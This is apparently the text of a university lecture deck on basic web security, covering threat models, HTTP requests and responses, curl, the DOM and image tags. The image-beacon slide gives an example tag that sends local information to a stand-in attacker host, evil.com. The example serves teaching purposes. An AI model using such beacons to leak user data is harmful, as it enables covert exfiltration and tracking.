cse484 cse584
play

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web - PowerPoint PPT Presentation

Oct 03, 2023 •457 likes •907 views

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web Security Web Attacker Sets up malicious site visited by victim; no control of network Alice Network Security Network Attacker Intercepts and controls network communication

  1. CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits

  2. Web Security Web Attacker Sets up malicious site visited by victim; no control of network Alice

  3. Network Security Network Attacker Intercepts and controls network communication Alice

  4. Web Malware Attacker Malware Attacker Escapes the browser to wreak havoc on Alice’s machine Alice

  5. Web Threat Models  Web attacker  Control https://attacker.com  Can obtain SSL/TLS certificate for https://attacker.com  User visits attacker.com This is what connects the world  Or: runs attacker’s Facebook app, etc. of web attacks to low-level  Network attacker memory-based exploitation  Passive: Wireless eavesdropper we’ve seen so far  Active: Evil router, DNS poisoning  Malware attacker  Attacker escapes browser isolation mechanisms and run separately under control of OS

  6. Goals of Web Security Sa Safely browse th the web Support secu ecure e web eb applic lications  Applications delivered over  Users should be able to We will see a lot the web should have the visit a variety of web sa same se security propertie ies of Java and PHP sites, without incurring we require for stand-alone and JavaScript, applications harm: but not C or C++  No stolen information  Maybe even better such as login credentials or properties because most cookies web applications enjoy the  Site A cannot compromise protection provided by memory ry-safe lan languages session at Site B

  7. Looking Ahead  HTTP  Communication  Rendering content  Navigation  Cookies  Security User Interface  Isolation  Frames and frame busting

  8. HTTP

  9. URLs or URIs  Global identifiers of network-retrievable documents  Example le: https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule Protocol Fragment Hostname Path Port  Special characters are encoded as hex:  %0A = newline  %20 or + = space, %2B = + (special exception)

  10. Short and Long URLs 10 10 Bit.ly: http://bit.ly/1vEIGks  http://longurlmaker.com:  http://www.longurlmaker.com/go?id=7continuedg20fIs.gd0GetShortyagl56001drawn%2Boutu6lingeringShortlinksX .sestretchedd7lingeringzc8faraway0UrlTeajbstretched15jcontinued011expanded86v3stretchedqdXil40ShortenURLk Xilz401spun%2Boutq54bextensiveShrtndwoutstretched151TinyLinkcontinued2lastingdltallaU76nr0h61g5aIs.gdd01 41cMooURL085ShortURLcShortenURL40stretchrangyXil3p17hSitelutionsuwURLvi1enlargedc03743186701Dwarfurl 4aefwextensive0EasyURL315continuedbprotractedb19GetShorty2SHurl171enduring038r8bURLviremote6URL1Shor tURLspun%2Boutelongated0aX.seoutstretched0d4distantSimURL27highd418olasting9ShoterLink8stretchedoSHurl4 lankydrawn%2Bout0drawn%2Boutlofty19a2kenduringShortenURLxs0spread%2Bout9distantFly2d10101great0w78 NutshellURL190Minilienstretchedn0stretchd0ShortenURL0enlargedtallX.seelongated9URL.co.ukspun%2BoutURLvi8 e1012Shim00Ulimit7lasting3Shim034far%2Boff47spun%2Bout17nwelongated17a99eeexpandedtallm9MooURL1dr emote46URL11NutshellURLStartURLb5itall40c6Shrinkr0Fly2lasting91n8clengthened51X.se5Minilien2ShredURLBea m.to99continued131G8L1ffarawaycontinued0distantrangy7c04964300315a2RubyURLfU76154j1roh82lengthened0 faraway1z4outstretched1lr1B654301URL09stringyq8ShrinkURL184h7Dwarfurldrunningloftylingering18spread%2Bo ut68101ShortURL10kalengthy9B653ab41fextensive0prolonged7p11expandedprolongedremotec2Minilien0dB65str etchingarfaraway3extensive1yclnk.in9lankygreat50TightURL173cURL.co.ukmba2049815920prolonged8fprotractedf 0stringy6i164eelongatedMiniliene9elongated0PiURL1488gd2020a30far%2Breachinglengthy216d411t691elongate1 6extensived0drawn%2Bout11lankyYepItB65Shim31extensiveURLCutterShim99GetShorty1042Fly2af0e8protractede longatey0111563FhURL9c3TinyURLn8toweringDwarfurl10d6350c5TightURL3lnk.in03Shrtnd6g0lingering18gangling prolonged8astringy7StartURL100TraceURLSmallr01drawn%2Bout60ganglingstringy80Beam.tocdistantsG8LX.sedra wn%2Boutedrawn%2Bouty040SitelutionsU7601drawn%2Bout6f53A2N2lasting1194stretchinggangling20lnk.inURLC utter135b80b3ShortURL6far%2Boffm013q515deep8WapURLShrinkURLd410090lnk.infar%2Boff701far%2Boff96ling ering8a6x38118Redirxfar%2Breaching1stretched0protracted16t0l21130b90106zShoterLink967Smallr9R

  11. HTTP Request Method File HTTP version Headers GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats Blank line Data – none for GET GET : no side effect POST : possible side effect

  12. POST 12 12 POST /pass.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://127.0.0.1/pass.php Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 30 username=zurfyx&pass=password

  13. Automation with CURL 13 13  curl --data "birthyear=1905&press=%20OK%20" http://www.example.com/when.cgi  curl --data-urlencode "name=I am Daniel" http://www.example.com  Submit/POST binary data to a URL  curl -X POST --data-binary @myfile.bin http://foo.com

  14. HTTP Response HTTP version Status code Reason phrase Headers HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Data Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set- Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> Cookies

  15. Common HTTP Codes 15 15 200 OK 401 Unauthorized 300 Multiple Choices 403 Forbidden 301 Moved Permanently 404 Not Found 302 Found 410 Gone 304 Not Modified 500 Internal Server Error 307 Temporary Redirect 501 Not Implemented 400 Bad Request 503 Service Unavailable 550 Permission denied

  16. Browser Tools 16 16

  17. Watch the HTTP Traffic 17 17

  18. HTTP Supports Caching 18 18

  19. And Responses Can Be Interesting 19 19

  20. And Surprising… 20 20

  21. Interacting with Google using CURL 21 21 1. Authenticate with Google first curl https://www.google.com/accounts/ClientLogin --data-  urlencode Email= you@gmail.com --data-urlencode Passwd= yourpasswd -d accountType=GOOGLE -d source= your.org-your.service- your.service.version -d service=wise SID=DQAAANcAAABjXXX; LSID=DQAAANoAXXX; Auth=DQAAANkAXXX  2. Get your spreadsheets curl --silent --header "Authorization: GoogleLogin  auth= DQAAANkAXXX " "https://spreadsheets.google.com/feeds/spreadsheets/private/full " | tidy -xml -indent -quiet 3. Get a particular spreadsheet curl --silent --header "Authorization: GoogleLogin auth=$AUTH"  "https://spreadsheets.google.com/feeds/download/spreadsheets/Exp ort?key=$KEY&exportFormat=tsv" | sort -n -k 15 -t $'\t'

  22. Rendering Content

  23. Rendering and Events  Each browser window  Events can be or frame…  User actions:  Loads content  OnClick  OnMouseover  Renders it  Rendering:  Processes HTML and scripts to display page  OnLoad  May involve images,  OnBeforeUnload sub-frames, etc.  Timing:  Responds to events  setTimeout()  clearTimeout()

  24. Connecting it All Together 24 24

  25. Slightly More Complex… 25 25

  26. Document Object Model (DOM) Object-oriented interface used to  read and write docs  Web page in HTML is structured data  DOM provides representation of this hierarchy Includes Browser Object Model  (BOM)  window  document  frames[]  history  location  navigator (type and version of browser)

  27. Deep DOM Trees 27 27

  28. Pre-Year 2000 28 28 frame

  29. Pre-Year 2000: Functionality Added Via JavaScript 29 29 frame

  30. Changing HTML using JavaScript, DOM  Some possibilities  createElement(elementName) HTML <ul id="t1">  createTextNode(text) <li> Item 1 </li>  appendChild(newChild) </ul>  removeChild(node)  Example: Add a new list item: var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext)

  31. HTML Image Tags 31 31 < html > … < p > … </ p > … < img src =“http://example.com / sunset.gif ” height="50" width="100"> … </ html > Any security issues?

  32. Image Beacons 32 32  Communicate with other sites  <img src =“http://evil.com/ pass- local- information.jpg?extra_info rmation ”>  Hide resulting image  <img src =“ … ” height=“1" width=“1">  Spoof other sites: add logos that fool a user

  33. Beacons in Practice 33 33

  34. onError in JavaScript 34 34  Triggered in case of error  Can register a JavaScript handler <img src="image.gif" onerror= "alert( 'The image couldn’t be loaded .')“ >

Recommend

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2 XSS-0 : client-side XSS-1 : reflective XSS-2 : persistent XSS Is Exceedingly Common 3 Web Hacking Incident Database (1999 -

887 views • 44 slides
CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Final Project 2 How many of you have

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Final Project 2 How many of you have

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Final Project 2 How many of you have your teams fully formed How many of you are still looking for a team? How many of you have a copy of A Bug Hunters Diary book? How many

537 views • 30 slides
CSE484/CSE584 MOBILE PLATFORM SECURITY Dr. Benjamin Livshits Two Main Attack Vectors Web

CSE484/CSE584 MOBILE PLATFORM SECURITY Dr. Benjamin Livshits Two Main Attack Vectors Web

CSE484/CSE584 MOBILE PLATFORM SECURITY Dr. Benjamin Livshits Two Main Attack Vectors Web browser Installed apps Both types of threats increasing in prevalence and sophistication source:

861 views • 31 slides
CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, Labs, and Project 2 Please

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, Labs, and Project 2 Please

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, Labs, and Project 2 Please be ready to give HW-3 due Friday a short 2-minute pitch Lab-3 due Tuesday about your strategy We want to give you Ask more questions

792 views • 21 slides
CSE484/CSE584 SECURE DESIGN PRINCIPLES, OS, AND RUNTIME SECURITY Dr. Benjamin Livshits Some of

CSE484/CSE584 SECURE DESIGN PRINCIPLES, OS, AND RUNTIME SECURITY Dr. Benjamin Livshits Some of

CSE484/CSE584 SECURE DESIGN PRINCIPLES, OS, AND RUNTIME SECURITY Dr. Benjamin Livshits Some of f the Common Principles Minimize attack Secure by surface area Default Principle of Fail-Safe Least Stance Privilege Secure the

975 views • 56 slides
CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Is Isolation Frame and IFRAME

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Is Isolation Frame and IFRAME

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Is Isolation Frame and IFRAME Window may contain frames from different sources Frame: rigid division as part of frameset iFrame: flo floati ting inline frame iFrame

787 views • 60 slides
CSE484/CSE584 MEMORY-(UN)SAFETY Dr. Benjamin Livshits FUD About Shellshock 2 CVE-2014-6271

CSE484/CSE584 MEMORY-(UN)SAFETY Dr. Benjamin Livshits FUD About Shellshock 2 CVE-2014-6271

CSE484/CSE584 MEMORY-(UN)SAFETY Dr. Benjamin Livshits FUD About Shellshock 2 CVE-2014-6271 Announcement 3 How Systems Fail il Systems may fail for many reasons, including Reliability deals with accidental failures Usability deals

778 views • 62 slides
COURSE IN INTRODUCT CTION Dr. Benjamin Livshits High-Level Course Logistics 2 https:/

COURSE IN INTRODUCT CTION Dr. Benjamin Livshits High-Level Course Logistics 2 https:/

CSE484/CSE584 COURSE IN INTRODUCT CTION Dr. Benjamin Livshits High-Level Course Logistics 2 https:/ ://courses.c .cs.washin ington.e .edu/courses/cse484/14au Course Logistics 3 Office hours: Tuesday after class Office hours: Mon

826 views • 59 slides

More recommend